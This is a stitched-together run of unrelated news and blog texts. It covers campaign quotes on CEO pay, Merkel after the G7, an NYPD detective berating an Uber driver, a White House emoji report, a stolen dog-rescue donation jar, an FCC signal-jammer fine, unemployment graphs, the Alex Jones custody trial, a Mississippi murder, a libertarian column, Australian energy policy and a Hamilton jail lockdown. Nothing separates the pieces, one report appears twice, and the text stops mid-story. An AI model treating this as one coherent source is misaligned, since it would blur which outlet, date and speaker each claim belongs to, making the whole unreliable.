• “Not everyone in America is struggling. Investors on Wall Street took home a record-setting $48 billion in bonuses this past year, even after losing millions in the credit meltdown.”
• “In 1960, the average CEO made 41 times what the average worker made. But in 2005, the average CEO made over 400 times the average workers salary. The share of corporate profits going to CEO pay has doubled since the 1990s. Meanwhile, the value of the minimum wage has plummeted 30% since 1979.”
• “We must renew America's basic bargain with the middle class and remove the stranglehold that entrenched corporate interests have on Washington.”
• “In order to fulfill our obligations to future generations of Americas, we must restore balance between America's corporations and America's working families.”
Hey John, FYI, it's not just Brock and Trip who read the Journal. It's 2 million other people with household incomes averaging well above $200,000 a year. If you were aiming for the middle-class readership, you shot a little bit high. Maybe it's time to rethink your press strategy, before you end up placing an ad for Alaskan oil drilling in Mother Jones.
My Plan to Stop Corporate Abuses [WSJ]
German chancellor tells election rally in Munich that Europe must take its fate into its own hands after ‘unsatisfactory' G7 talks
Angela Merkel: EU cannot completely rely on US and Britain any more
Europe can no longer completely rely on its longstanding British and US allies, Angela Merkel has warned – saying the EU must now be prepared to “take its fate into its own hands”.
Speaking after bruising meetings of Nato and the G7 group of wealthy nations last week, the German chancellor suggested the postwar western alliance had been badly undermined by the UK's Brexit vote and Donald Trump's election as US president.
Trump is wrong to criticise Germany over trade – he should look closer to home Read more
“The times in which we could completely depend on others are, to a certain extent, over,” she told an election rally in Munich on Sunday. “I've experienced that in the last few days. We Europeans truly have to take our fate into our own hands.”
The chancellor told a 2,500-strong crowd in the Bavarian capital that Germany and Europe would naturally strive to remain on good terms with the US, Britain and other countries, “even with Russia”, but added: “We have to know that we must fight for our future on our own, for our destiny as Europeans.”
The two-day G7 summit in Italy pitted the US president – whom Merkel did not mention by name – against the leaders of Germany, France, Britain, Italy, Canada and Japan on several issues.
The leaders vowed to fight protectionism, reiterating a “commitment to keep our markets open”; step up pressure on North Korea; cooperate more closely on terrorism; and look into placing tougher sanctions on Russia.
But while six of the seven renewed their commitment to the 2015 Paris accord on climate change, Trump said he needed more time to decide.
Angela Merkel: this is what the leader of the free world should act like | Suzanne Moore Read more
During his election campaign, Trump frequently questioned the value of the EU, welcomed Britain's vote to leave the bloc and spoke positively of anti-EU politicians such as the French far-right leader Marine Le Pen.
Merkel said the result of the G7 talks, which she described as “six against one”, was “very difficult, if not to say very unsatisfactory”. Trump was more positive on Twitter, saying: “Just returned from Europe. Trip was a great success for America. Hard work but big results!”
At the Nato summit in Brussels on Thursday, Trump repeated past accusations that other members of the alliance were failing to match America's military spending commitment of 2% of GDP, saying this was “not fair” on US taxpayers.
He failed to endorse the pact's article five mutual defence clauses – an omission seen as especially striking as he was unveiling a memorial to those killed in the 9/11 terrorist attacks against the US, the only time it has been triggered.
The US president reportedly described German trade practices as “bad, very bad” in separate talks in Brussels and complained that Germany, Europe's largest economy, sells too many cars to the US.
By contrast, Merkel said she wished the new French president, Emmanuel Macron, every success and promised Germany would do what it could to help France in a bid to revive the ailing Franco-German engine that long powered Europe.
“Where Germany can help, Germany will help,” she said to loud applause, “because Germany can only do well if Europe is doing well.”
Responding to Merkel's plea for EU unity – potentially significant in view of Britain's upcoming Brexit negotiations with the EU27 – the Liberal Democrats said they were the “inevitable outcome” of Theresa May's decision to position herself closely with Trump.
“The prime minister has allied herself with Donald Trump and these comments are the inevitable outcome,” Lib Dem leader Tim Farron said. “It doesn't have to be this way; a vote for the Liberal Democrats can change Britain's future.”
Merkel, who faces a delicate balancing act in seeking to preserve the transatlantic alliance while campaigning hard for re-election, was unusually blunt in her assessment of Trump's refusal to commit on climate change – a key concern for many German voters.
Polls show the chancellor, in power since 2005, is on course to be re-elected for a fourth term in September, with her lead in the polls over a revived Social Democrat opposition widening to double digits.
The Paris accords were “not just any old agreement, but a central agreement for shaping globalisation,” the German chancellor said, stressing that there were at present “no signs of whether the US will stay in the Paris accords or not”.
Macron, however, was more optimistic about the relationship with Trump. “I met a leader who has strong convictions on a number of subjects, some of which I share, such as terrorism or upholding our rank in the league of nations,” the French president said.
“It was a first experience for both of us and he saw the interest of a multilateral discussion.” Macron added that the two days of wrangling represented “progress”, and refused to enter into a “logic” of six against one.
“It's not in our interest,” he said. “There are disagreements around the table. There was one on climate, but I hope we'll reduce that gap. Mr Trump is a pragmatist and I'm hopeful that once he considers all the arguments we made and in the interests of his country he will confirm his commitment.”
An undercover police officer who was captured on video ranting at an Uber driver is assigned to the Joint Terrorism Task Force, it has emerged.
The New York Police Department's Internal Affairs Bureau is investigating the incident after the footage was posted online involving Detective Patrick Cherry.
One of the passengers in the car captured the exchange after the incident in West Village.
Scroll down for video
Detective Patrick Cherry, pictured in the blue shirt, launched his tirade after the Uber driver hooted at him
The driver, named only as Humayun, pictured, tried to repeatedly apologise to Detective Cherry
The officer has been named by the New York Daily News as Detective Patrick Cherry of the NYPD's joint terrorism task force.
Detective Cherry was trying to park his Hyundai without indicating when the Uber driver known only as Humayun honked his horn.
The angered detective pulled over the Uber cab and launched a tirade, questioning the diver's command of the English language as well as his car control skills.
Detective Cherry is now under investigation by the Civilian Complaint Review Board following a complaint of 'discourtesy'.
President of the Detectives Endowment Association said Detective Cherry had been visiting his colleague Detective Harry Hill who had recently had a heart attack while undergoing surgery and was very stressed.
He said: 'The past five days have been emotionally draining for the members of the JTTF dealing with their fellow detective's health
'Despite what some people think, cops have feelings, too.'
During the three-minute video, Detective Cherry shouts: 'I don't know where you're coming from, where you think you're appropriate in doing that; that's not the way it works. How long have you been in this country?'
The two passengers in the backseat of the car can be heard assuring the driver that he has done nothing wrong, with one of them saying; 'It's not your fault; this guy's just a d***.'
Moments later the cop returns with a ticket, this after he has pounded on the car and, according to one of the passengers, thrown things in the vehicle.
As the driver agrees with everything the cop says, he manages to cut off the man, which sends him into another tirade as he screams; 'I don't know what f****** planet you're on right now!'
The officer also mocks the driver's accent throughout and his pronunciation of certain words.
Passengers in the cab claimed that Detective Cherry failed to indicate before attempting to park his Hyundai
According to the New York Daily News, the NYPD has seen the video and said in a statement; 'We are aware of the incident and video and it is under review with the department's Internal Affairs Bureau.'
'Our Uber driver, Humayun, was abused by a police officer today in New York,' Sanjay Seth, who took the video, wrote on his Facebook page on Monday.
'The unending rage, door slamming, throwing items into the car, threatening arrest without cause was bad enough - but the officer's remarks at the end really took it to another level.'
The White House has removed emoji characters out of a newly published report after news outlets indicated that some millennials were offended by the administration's latest technique to empathize with younger voters.
The report, “15 Economic Facts About Millennials” is styled as a Buzzfeed-like listicle, which have grown in popularity among younger generations for their quick delivery and humorous nature.
The White House sprinkled emojis throughout the report on college education and student debt, technology, and healthcare, published on Friday, but on Saturday the emojis were missing from the document.
“This is an example of what we heard about back in 2008, Obama using digital technologies to excite a new, younger demographic,” Natalia Mehlman-Petrzela, an assistant professor of history at the New School University, told The Atlantic on Friday. “In the world of Twitter and Instagram, millennials are using emojis more and more, so it makes sense to use that strategy to appeal to people.”
Emojis are not to be confused with emoticons, however. Emoticons, are the more primative use of text character combinations to form symbols, like (sic) :-) or :-(. Emojis, originally created for Apple devices, are pictures inserted into messages, downloaded through an app. Emojis are limited to the characters available in the app, while emoticons are endless.
Despite it's efforts to connect with an audience obsessed with emojis, Ms. Mehlman Petrzela said that the White House could be inadvertently offending their target audience.
“I am most curious to see if this is something millennials find offensive or engage with it. I don't think he is trying to say, ‘millennials don't know how to read,' or ‘this is the only way they can be reached,' but I think a millennial could find this tremendously infantilizing,” she said. “And a lot of the data [in the report] suggests, based on the White House's own conclusions, millennials are anything but unserious and anything but over-playful. They are more focused on their studies than other generations have been, more focused on their businesses, so one would think the White House would and does realize that the millennial generation is more than capable of reading, not just looking at cute pictures.”
Although the report used cutesy characters, not all of the details are upbeat. Student debt is on the rise and the unemployment rate remains elevated, according to the report.
Copyright © 2019 The Washington Times, LLC. Click here for reprint permission.
A local rescue group says a man stole a donation jar that was collecting money to pay for an injured dog's surgery. News4's Tom Sherwood reports. (Published Friday, Nov. 15, 2013)
Three days after NBC Washington first reported on the theft of a donation jar that was collecting money to pay for an injured dog's surgery, a nonprofit group has raked more than $4,000 in new contributions from viewers who saw Niko's story.
Niko, a 10-month-old border collie/Australian cattle dog mix, arrived at Rural Dog Rescue with a badly broken leg that hadn't healed correctly.
Donations to pay for his $4,000 surgery and follow-up appointments have been pouring in since word got out about the man who stole money that had been donated to cover Niko's medical care.
As of Monday morning, the group had raised about $8,257 for Niko -- and almost half of that amount came in just in the past three days.
Zoo's Panda Cub Weighs 5 Pounds!
"We are overwhelmed with the support and grateful for everyone's generosity in helping Niko and our other rescue animals," said Kim Hawkins, owner of Rural Dog Rescue.
Many donors noted that they'd seen the story on NBC Washington and News4, and they wanted to help. Some signed their pets' names instead of their own.
"Our flat-coated retriever, Ben, would like to send his support for his friends," read one message from a donor.
The donations were meant to cover the loss of the donation jar that Hawkins had placed on the counter of the pet supply store, Howl to the Chief, that she owns on Capitol Hill.
Last Wednesday morning, a man entered the store at 733 8th St. SE and asked employees several questions before buying a small dog bone. A few minutes later, a worker realized the donation jar for Niko was gone.
Surveillance video shows the man hiding the jar in his coat before leaving, Hawkins said.
"It's like stealing from a child," she said. "You don't steal from a nonprofit for a dog limping around on three legs."
Hawkins later found the donation jar -- empty -- on the ground at the corner of 6th and G streets SE. She estimated the thief got away with about $300, because the jar was stuffed with $10 and $20 bills.
"We've been really, really promoting this since his surgery's almost $4,000.... In rescue, every dollar counts," Hawkins said.
Niko had his surgery Nov. 7 and is recovering at Hawkins' home.
"He's doing good," she said. But he'll need six to eight costly physical therapy sessions at $175 each.
"While the money matters, it's just more the principal and the ethics of this. Hopefully we'll recoup whatever was in the jar and raise money so he can get all of his therapy," she said on Friday. And since then, that's just what they've done.
Hawkins has filed a report with D.C. Police, but she said Friday that no one had been out to see her yet, and officers told her they can't use fingerprints from the jar since it had been in a public place.
The group is continuing to collect money online -- and as for the donation jar, it's back at the pet shop. There's one change this time, though: "We have it secured so nobody can take it," Hawkins said.
MCFC: Last game of the season quiz
The season is at an end, Summer is nearly here, Man City play their final game.
But how much do you know about final league games of the past?
Take the quiz to find out!
Challenge yourself with the MCFC: Last game of the season quiz. 11 tough questions based on the final league game of the season across the history of Man City. Relegations, promotions, the bizarre and wonderful are all covered in this quiz. Are you a football genius?
The Gingerwig has put his ginger thinking cap on and created a quiz all about the final league games of the season from Man City's history (yes I know we don't have one). These 11 questions will tell if you're a Man City expert or a David Moyes style Football Genius.
Check out the quiz below and make sure you share your results. If you want the answers go HERER
0
SHARES
Tell your friendsTweet this
Make sure you're prepared by checking out our 21 MCFC essentials for your summer holiday
You may also like
21 MCFC essentials to take on holiday
Quiz: Where should you sit at the Etihad?
Aguerooooooooo: 9 ways to remember that goal
Close
The Federal Communications Commission (FCC) has fined a man $48,000 for using a signal jammer during commutes.
The man was using the device as a means to interrupt drivers from using their handsets while cruising on a Florida highway, according to the FCC report.
Florida laws forbid owning and using jammers on public roads. The devices are branded as a threat to public safety due to the fact that emergency response teams could be hindered by their use.
Jason Humphreys was caught in the act of denying other drivers cellular signal on the Interstate 4, between Seffner and Tampa.
The FCC's report states that the man had been jamming communications over a period ranging from 16 to 24 months prior to being apprehended, in 2014.
MetroPCS observed that disturbances occurred next to its cellular broadcast towers at regular intervals and alerted police officers. When the cops caught him, Humphreys told them that he was using the jammer to curb people's habit of using a phone while driving.
The list of offenses includes unauthorized operation, use of an illegal device, and causing intentional interference.
Official papers from the FCC show that the regulator wanted to fine the man with $48,000 since 2014. Taking into account the nature and prolonged timeline of the illegal activity, the FCC asked for the top fine of $16,000 for each offense.
The FCC is very determined to put a stop to illegal practices and just this May 25 it fined a Chinese venture that was selling jammers online. CTS Technology was fined $34.9 million for merchandising cellular jammers over a two-year period.
Investigations dating to 2014 hinted that the firm was misleading its customers, guaranteeing that the jammers are FCC compliant. The enterprise's store contained a wide array of devices.
Shoppers could find anything from tiny, easy-to-hide devices to potent electronics ready to "disrupt a wide range of communications systems for several blocks."
Travis LeBlanc, one of the members in the commission, notes that public safety, business deals and general communications rely on the proper functioning of cellular and GPS.
That is why any effort to market or merchandise such gadgets to the public is illegal and can bring substantial penalties.
ⓒ 2018 TECHTIMES.com All rights reserved. Do not reproduce without permission.
The US unemployment rate was down to 4.4% in April, which is the lowest we've seen since before the big recession (about 10 years ago). But a single number seldom tells the whole story, so let's look at unemployment data in several different ways, to get a more complete picture...
My quest for better unemployment graphs started back in 2011, when I saw the following graph in the news. I think it must have been created by an artist (rather than software), because there's no way the 8.6% (which I circled in red) would be lined up with the 9.0%:
I decided to create my own version of the graph using SAS software, so that the values would be accurately represented in their correct locations. Here's what I came up with - my version shows that the 8.6% should be far below the 9.0% when the axes are scaled this way:
But you probably also noticed the big red 'X' through the graph (which is something I do to bad/misleading graphs in my blogs, so people don't mistakenly think they are good examples). The problem with this graph is that axes make it look like there was a huge drop ... when it wasn't really that huge in the grand scheme of things. Here's the same data plotted with the y-axis going to zero, which I think is what the news was trying to show in the first place:
The graph above is a reasonable representation of the 2011 data, but why just show one year of data? Wouldn't it be even more interesting and informative to show lots of years of data - that way we can compare the current recession to previous ones, etc? I think a graph like the following is much more informative:
In the above graph, we can see that the unemployment rate at the beginning of various recessions was different. Therefore it's difficult to compare the recessions, and how long it took to recover back to the pre-recession unemployment rate. The following graph makes it easier to compare recessions, in that regard:
I had heard that the 2008 recession was different from previous recessions, because it took the unemployed people longer to find jobs. The following plot shows the number of people unemployed for 27 or more weeks:
Some claim that the traditional unemployment number is lower than the true number of people who are unemployed. The Bureau of Labor Statistics has some "alternative unemployment rates" that might help with that claim. Looks like the number is indeed much larger if you include the unemployed part-time workers, for example:
Another number you can look at, instead of just unemployment, is the civilian labor force participation rate. Some of the fluctuations in this number can be explained by women & baby boomers entering the work force, and recently the baby boomers starting to retire.
And possibly more important than how many people are unemployed, is where people are unemployed. This wouldn't be such an issue if the unemployment rate was fairly constant across the nation, but there are definitely some areas that have much higher rates than others. Here's a snapshot of the latest data, by county (you can also click this link to see the map animated over time).
What did I use to create all of the above graphs? ... You guessed it - SAS Software!
I know there are a lot of analysts out there with much more in-depth knowledge about unemployment data than me - do any of you have any special insight, or favorite ways to graph the data, that you'd like to share? Feel free to leave a comment.
LAKE BUENA VISTA, Fla. -- Devin Price and Isaiah Morton scored 13 points each and Marist beat Vanderbilt 50-33 in a consolation round game Friday at the Old Spice Classic.
Jay Bowie added four points and 12 rebounds for Marist (2-3).
Vanderbilt (1-3) got eight points from James Siakam. The Commodores shot just 23.0 percent (14 of 61) and finished with their lowest point total since a 33-31 loss to Mississippi State on Jan. 30, 1982.
Both teams lost in Thursday's opening round. Marist lost 87-44 to West Virginia, while Davidson beat Vanderbilt 75-62.
Price hit a 3 and Chavaughn Lewis scored on a fast-break slam during an 11-0 run to start the second half that gave Marist a 38-14 lead with 15 minutes left.
Vanderbilt didn't get its first point in the second half until Siakam's free throw with 13:54 remaining. After missing their initial eight shots, Kedren Johnson's layup 1 minute, 34 seconds later was the Commodores' first second-half basket.
Johnson, who had career-high 28 points Thursday, scored four Friday.
Rod Odom's basket got Vanderbilt within 47-30 with two minutes remaining.
Price made a 3-pointer to put Marist ahead 27-9 three minutes before intermission.
Morton hit a 3 and Lewis had a three-point play as Marist went up 8-0 with 15:21 left in the first half. T.J. Curry's long-range jumper extended the Red Foxes' advantage to 13-3 three minutes later.
Vanderbilt missed its first 10 shots. Sheldon Jeter got the Commodores' first basket, a 3-pointer six minutes into the game.
Vanderbilt, looking to replace its top six scorers from last season, made just 6 of 30 shots (20 percent) during the opening half.
click to enlarge via Michigan department of Civil Rights' Facebook
Since July 7, a new system for sign language interpreters in Michigan requires different levels of expertise for different situations.As Michigan civil rights law calls for, if someone is in need of an interpreter one needs to be provided to them, but up until now that interpreter did not need to have a specific level of vocabulary knowledge catered to different situations.With the new requirements there are three tiers of interpreters: general knowledge and education settings, moderately specialized knowledge such as government meetings and medical settings, and highly specialized knowledge such as psychiatric evaluations and legal procedure.This comes as a positive change in context of the complicated history both Michigan and the nation have with recognizing the civil rights of people who are deaf or hard or hearing. 2007 was the first year Michigan, or for that matter any state, passed legislation mandating that interpreters need to meet certain criterion. Yet, only in 2014 was the criterion defined within administrative code. Still, various public sector entities are implementing and working out the kinks in providing proper deaf and hard of hearing interpreters and services.These changes also have a large impact on any mental or physical health providers, along with anyone who provides legal services. All of these professions now legally are required to provide the tier of interpreter as dictated by the new requirements if requested by someone who is either fully deaf or hard or hearing.As of now, the interpreter, interpreter agency, and interpreter educator database do not include the tier of each licensed person, but plans are underway to change that for current and future licensed interpreters.
Alex Jones (Screenshot)
Right-wing radio host Alex Jones will be locked into a child custody trial for the next few weeks in Austin, Texas, according to The Austin American-Statesman. But his attorneys are making the argument that Jones shouldn't be judged by his on-air persona.
“He's not a stable person,” said Kelly Jones in an emotional pretrial testimony. “He says he wants to break Alec Baldwin's neck. He wants J-Lo to get raped. I'm concerned that he is engaged in felonious behavior, threatening a member of Congress.”
Mrs. Jones is referring to her husband's comments about Rep. Adam Schiff (D-CA) who is heading the Democrat's side of the Russia investigation.
“He broadcasts from home,” she continued. “The children are there, watching him broadcast.”
She is seeking sole custody of their 14-year-old son and 9- and 12-year-old daughters.
“This case is not about Infowars, and I don't want it to be about Infowars,” District Judge Orlinda Naranjo said to the legal team of the couple. “I am in control of this court, not your clients.”
Alex Jones' attorney Randall Wilhite explained that he shouldn't be judged on things like Pizzagate, which prompted one man to walk into to Comet Ping Pong pizza parlor with a gun ready to open fire.
“He's playing a character,” Wilhite said of Jones. “He is a performance artist.”
Kelly Jones' attorney showed a clip from a July 2015 broadcast in which Jones had his 12-year-old son play some of the videos he made for InfoWars, saying that the team has taken the child “under their wing.”
“He is undoubtedly cut out for this, and I intend for him to eclipse what I've done. He's a way greater person than I was at 12,” Alex Jones said to his son in the video. “I love you so much, and I didn't mean to get you up here, sweetheart, and tell people how much I love you, but you're so handsome, and you're a good little knight who's going to grow up, I know, to be a great fighter against the enemy.”
Alex Jones' attorney called it “good stuff” but Kelly Jones attorney explained he was laying the groundwork for the argument that there isn't a difference between Alex Jones the Infowarrior and Alex Jones the father.
“This is the world he has planned for his kids,” Kelly Jones' attorney said. He went on to quote Mr. Jones at a recent hearing in which he swore that what he says on air is what he actually believes and not a character as the host's attorney claimed.
Authorities said a Prentiss County local man has been charged with first-degree murder in the fatal shooting of his mother Wednesday night.Randy Tolar said John Ed Inman, 54, was being held without bond pending an initial court appearance.Tolar said deputies found the body of Letha C. Pace, 85, at a home east of Booneville. She was pronounced dead the scene from a gunshot wound.G.W. Horn, Letha Pace's brother, said Inman and his mother lived together for years.“You don't live with a mother that long without surely having some love for her,” Horn said.Horn lives down the street from the home Pace and Inman shared.“It's just awful that something like this has happened,” Horn said. “It's just nerve wracking. It's nerve wracking to me.”Tolar said he's known Pace throughout his career as sheriff.“I've always had a friendly relationship with her,” Tolar said.But the sheriff said he had responded to disturbances at the home in the past.“I hate that it got to this point,” he said.Tolar said Inman was arrested at the scene.
Authorities said a Prentiss County local man has been charged with first-degree murder in the fatal shooting of his mother Wednesday night.
Randy Tolar said John Ed Inman, 54, was being held without bond pending an initial court appearance.
Tolar said deputies found the body of Letha C. Pace, 85, at a home east of Booneville. She was pronounced dead the scene from a gunshot wound.
Advertisement
G.W. Horn, Letha Pace's brother, said Inman and his mother lived together for years.
“You don't live with a mother that long without surely having some love for her,” Horn said.
Horn lives down the street from the home Pace and Inman shared.
“It's just awful that something like this has happened,” Horn said. “It's just nerve wracking. It's nerve wracking to me.”
Tolar said he's known Pace throughout his career as sheriff.
“I've always had a friendly relationship with her,” Tolar said.
But the sheriff said he had responded to disturbances at the home in the past.
“I hate that it got to this point,” he said.
Tolar said Inman was arrested at the scene.
AlertMe
Column by R.K. Blacksher.
Exclusive to STR
There has been a lot of political grandstanding lately about the need to eliminate "waste, fraud, and abuse." The U.S. government's official “economic stimulus” website has a page where people can report instances of “waste, fraud, and abuse.” There are similar “waste, fraud, and abuse” hotlines on the War Department's website , the HUD website , and a multitude of other federal, state, and local government websites. During the 2010 campaigns, this nefarious trio of budgetary bugaboos was regularly trotted out by “fiscally responsible” political candidates attempting to establish their budget-cutting bona fides.
Many people view this crusade against “waste, fraud, and abuse” as a charade used by politicians to appear fiscally responsible while avoiding the risk of offending members of the tax-feeding class by proposing actual budget cuts. This view is largely accurate. Denouncing "waste, fraud, and abuse" is indeed a favorite tactic of political charlatans (but I repeat myself) everywhere.
However, this view overlooks a much more important point. Politicians use these descriptions as though "waste, fraud, and abuse" are aberrations from the norm, minor kinks to be fixed in an otherwise well-oiled statist machine.
They are not. Waste, fraud, and abuse are the defining characteristics of the government. Everything the government does can be accurately characterized as waste, fraud, abuse, or some combination of the three.
Here is how the government of San Diego defines "waste, fraud, and abuse":
Waste: The intentional or unintentional, thoughtless or careless expenditure, consumption, mismanagement, use, or squandering of City resources. Waste also includes incurring unnecessary costs because of inefficient or ineffective practices, systems, or controls.
Fraud: Any intentional act or omission designed to deceive others, resulting in the victim (City of San Diego) suffering a loss and/or the perpetrator achieving a gain.
Abuse: Intentional destruction, diversion, manipulation, misapplication, maltreatment, or misuse of City resources. Extravagant or excessive use as to abuse one's position or authority. Abuse can occur in financial or non-financial settings.
There are a number of serious problems with these definitions. The references to “City resources” and the designation of the City of San Diego as “the victim” are particularly problematic. The resources actually belong to the tax-cattle from whom they were stolen, and the victims are actually the people afflicted by the government of San Diego. But these definitions will still provide a useful framework for determining which actions of the state constitute “waste, fraud, and abuse.”
Consider, for example, the cabinet-level executive department responsible for managing government-owned land, natural resources, national parks, and administering programs designed to "assist" Native Americans. The department in question is, of course, the Department of the Interior, and it is a colossal waste. In its “mismanagement” of the land and national parks that it owns, the government certainly incurs “unnecessary costs because of inefficient or ineffective practices, systems, or controls.” The land and the parks would be much better managed if they were privately owned. In addition, it is pretty safe to say that Native Americans would be much better off without the government programs that have supposedly been designed to “assist” them.
Social Security is a state-run Ponzi scheme that functions by stealing money from people who are currently working and transferring it to prior victims of state-theft (i.e., retirees). In return, the state promises to partially reimburse the victims of its theft by stealing money from future tax-victims. This is a very clear example of fraud. People have been deceived into believing that their money is safely stored away in a Social Security Trust Fund, and millions of people are going to suffer losses when the system goes broke .
And, of course, we are all familiar with the routine humiliation that airline passengers suffer at the hands of TSA functionaries. These "extravagant" and "excessive" uses of "one's position or authority" are blatant and egregious examples of abuse.
Waste: The Department of Agriculture, the Department of Labor, the Department of Housing and Urban Development, the Department of Transportation
Fraud: The Federal Reserve, Medicare, the Department of Education, the Department of Commerce, the Department of Energy
Abuse: The Department of Defense, the Department of Homeland Security, the IRS, the CIA, the FBI, the DEA, the EPA
As this non-exhaustive list indicates, waste, fraud, and abuse are not aberrations from the norm. They are not unfortunate byproducts of otherwise well-functioning government programs. To the contrary, the government produces nothing but waste, fraud, and abuse.
By all means, then, let's eliminate waste, fraud, and abuse. To do so would be to eliminate the entire government.
[1] Most of these examples actually fit into all three categories. This is, needless to say, a non-exhaustive list.
If Australia is going to meet its targets on reducing emissions from its energy sector and keeping energy prices under control, it's going to need some revolutionary thinking from somewhere, writes Giles Parkinson.
If Australia is going to meet its targets on reducing emissions from its energy sector and keeping energy prices under control, it's going to need some revolutionary thinking from somewhere. And it needs to come quick, because the decisions taken over the next couple of years on spending tens of billions of dollars in energy infrastructure is likely to lock Australia into a path from where it will be difficult to reverse. Are the policymakers listening? A new report by the University of Technology's Institute of Sustainable Futures released today throws up a serious challenge to the network operators who plan to spend $45 billion on network upgrades in the current five-year period, and will likely do the same in the next. The report, Think Small: The Australian Decentralised Energy Roadmap, says one third of this expenditure -- $15 billion in the current period -- could be avoided if Australia adopted decentralised energy technologies, such as efficient use of energy, peak load management and distributed generation, which means generating plants of 30MW or below, such as small wind farms, biomass plants, solar farms, rooftop PV, small hydro, fuel cells, cogeneration and trigeneration. The study, completed in collaboration with the CSIRO and four other universities, says these are the quickest and cheapest options to reducing emissions and meeting peak demand. The lowest-cost deployment of decentralised energy could achieve more than $2.8 billion in annual savings in consumer energy costs, and cut carbon emissions by 4.5% below business as usual. But it could be more ambitious: the study found that 7000 MW of coal-fired generation capacity could be shut down by 2020 and replaced, primarily, with distributed energy, renewables and some peaking gas plants. Not only would this cut annual energy costs by 5% below business as usual, it would reduce 2020 electricity sector emissions by 35.8 MtCO2e per annum -- a 15.8% emissions reduction compared to BAU -- and at a net saving to consumers. Australia, because of its reliance on centralised fossil fuel power, has one of the lowest percentages of distributed energy in the world -- at 5.4% of capacity compared to the global average of more than 11% -- and its energy efficiency is also poor, growing at 0.2% compared to 1.2-1.4% a year in the best economies. The draft energy white paper released this week draws attention to those issues, but it is still a document that is centred around the build out of large, centralised power stations as the cornerstone of the energy grid. This graph below is informative, because it lays out the cost of the technologies proposed under the plan.
Solar PV is rated the most expensive of the technologies, and some may contest the estimated costs. But Chris Dunstan, one of the report's authors, says whatever its current cost, it is clearly falling rapidly and it will play a critical role -- on rooftops, and in industrial areas where it can pretty much match day-time air conditioning loads.
Steffany Liscombe stands outside of the Barton Street jail in a line up of anxious visitors. She hopes to get in to visit her boyfriend, an inmate there.
They haven't seen each other since the jail guards walked out. It's been almost three weeks. That's because, without the guards, the building has gone into a lockdown.
"It really, really, really sucks," Liscombe said, leaning up against the windowed wall of the jail's front entrance.
She tried coming every couple of days, she said, but with limited staff to walk inmates down the halls and into the visitation room, she'd been "turned down" every time.
"It's unfair to everybody," her friend Crystle Smith pipes up. She's leaning against the wall beside her.
"It's stupid. If you don't get in. How's that fair to anybody?"
Smith's young son tries to squeeze into the gap between her legs and the wall. He giggles mischievously.
"I'd say how I really feel," Liscombe said, "but there are young ears around us." She pats the boy's blonde head. "Let's just say, I'm peeved."
Since December, Liscombe has visited her boyfriend about two or three times a week. But with correction officers off the job, the building is running a whole lot differently.
Fewer calls, showers and visitors
Defense lawyers and family members who have been inside the jail, say visitation hours, shower times, phone call access and time outside of their cells have been greatly scaled back. Jail managers from across the province have been brought in to fill the shoes of about 200 correction officers.
Not trained as guards, and understaffed, the jail has been put on a "rotational lockdown," the official term the Ministry of Community Safety and Correctional Services uses. Yet neither the ministry nor the jail's administration have explained exactly how this type of lockdown plays out in practice.
"Rotational lockdown" should mean that inmates are let out in shifts — for a portion of the morning or afternoon — and only in small groups, say the officers. But they can't be sure what's happening inside the building because they're stuck on the lawn, outside.
Insight from inside
Like all inmates' family members, Christine Yensen, couldn't enter the jail during the first few days of the dispute. She wanted to see her husband.
Yensen hated learning that during that time he wasn't able to have a shower or get clean clothes. She has since been allowed in to see her husband. But walking out of the jail Thursday, after just 20 minutes with her man, Yensen said she's unhappy about the conditions.
Pausing outside of the jail, she lists the changes she has heard about inside. The inmates don't receive clergy visits like they use to, programs are suspended and there are no evening visits, Yensen, 26, said.
She counts the issues off on her fingers. And "not many people have been getting yard." That is, inmates have been kept indoors. No fresh air, she said.
"I just get frustrated," Yensen said, her arms folded across her, as she squints in the sun. "It's kind of upsetting."
Christine Yensen pays a short visit to her husband, an inmate at the Barton jail. (Kate Adach/CBC)
Joe Fiorucci, president of the Hamilton Criminal Lawyers' Association, has other concerns. Some of his clients have had their court proceedings delayed. Colleagues have told him they've experienced the same.
Being short-staffed has delayed transportation to and from jails especially for out-of-town cases, Fiorucci said.
Perhaps more worrying, are the health concerns.
"I have clients who have been complaining that they're not getting their medication properly," said Beth Bromberg, a Hamilton-based defense lawyer.
The ministry told CBC Hamilton in an email that "medication [is being] given to inmates, as prescribed."
But Bromberg said one client who hadn't received methadone, had been "very sick with withdrawals." Another client of hers, who she describes as "very, very disadvantaged and needy," will soon be released from prison.
In a few weeks, Bromberg's client will be able to walk down Barton Street. But he might not gain access to a discharge planner — someone who could help him with housing and psychiatric needs — before he's let out.
"There's no discharge planner in the jail," she said. "This compromises his chance of success and the public's safety."
Cramped quarters
Jail cells at the Hamilton-Wentworth Detention Centre are about eight feet wide and 12 feet long, said Jim Mitchell, a correction officer and representative for the Ontario Public Service Employees Union.
By his estimate, the ceilings are about seven to eight feet high. There are about 200 identical cells, he said. Each has a toilet, sink and bunk bed. Yet much sleep — or in this case, house — three inmates.The third prisoner is given a plastic-coated mattress for the floor.
The jail was built to house 510 inmates, but it has more than that. The ministry said there are 550 inmates.
Correction officers say there are more. Closer to 600.
Under regular conditions, cells are opened daily for intervals between meals, Mitchell said. Inmates must eat in their cells but are free to come and go as they please between about 8 a.m. and 11 a.m., 12:30 p.m. and 4 p.m., and 5:30 p.m. to 8 p.m.
The shower area and washroom are "open to use whenever," and they can visit the yard daily. Under the rotational lockdown, inmates have gone from having at least eight hours a day outside of their cells to quite possibly no more than one.
"They're on a 23-hour lockdown," said Liscombe, the young woman who had been waiting Thursday for her first chance to get in.
Christine Yensen gets support from a friend waiting outside the Barton jail. (Kate Adach/CBC)
Lawyer Fiorucci spoke to a client Wednesday to ask him about the conditions in the building. His client told him they get about 40 minutes a day outside of their cells and only six or seven inmates are let out at a time. Their time out is about as cramped as their cells.
Bromberg said she received a phone call from a client who said he'd had 20 minutes out of his cell and in that time had to choose between calling her or taking a shower. His experience bothered her.
A human rights issue and safety concerns
"It's still a human rights issue, right?" Bromberg said. "People have to be able to be housed in decent conditions."
This type of restricted phone access creates hostility among the inmates, Fiorucci said.
"Obviously they're going to all want access. You can imagine what happens (when tensions rise)."
Correction officers worry that the jail may have become increasingly dangerous. They thought it was bad before.
The guards have not been inside the jail for nearly three weeks, citing unsafe work conditions. On Aug. 13, someone had noticed an electrical plate cover had gone missing.
Suspecting an inmate may have been storing the item to fashion it into a weapon — an issue the guards say is frustratingly common — they asked to search for it.
Their only condition: that they could wear safety vests that would protect them from being stabbed by the rouge piece of metal. Management denied this request.
Three workers assaulted
Since then, correction officers believe tensions among the restrained inmates and the unfamiliar staff have grown. No doubt the facility has become a rougher, more dangerous place for everyone, they say.
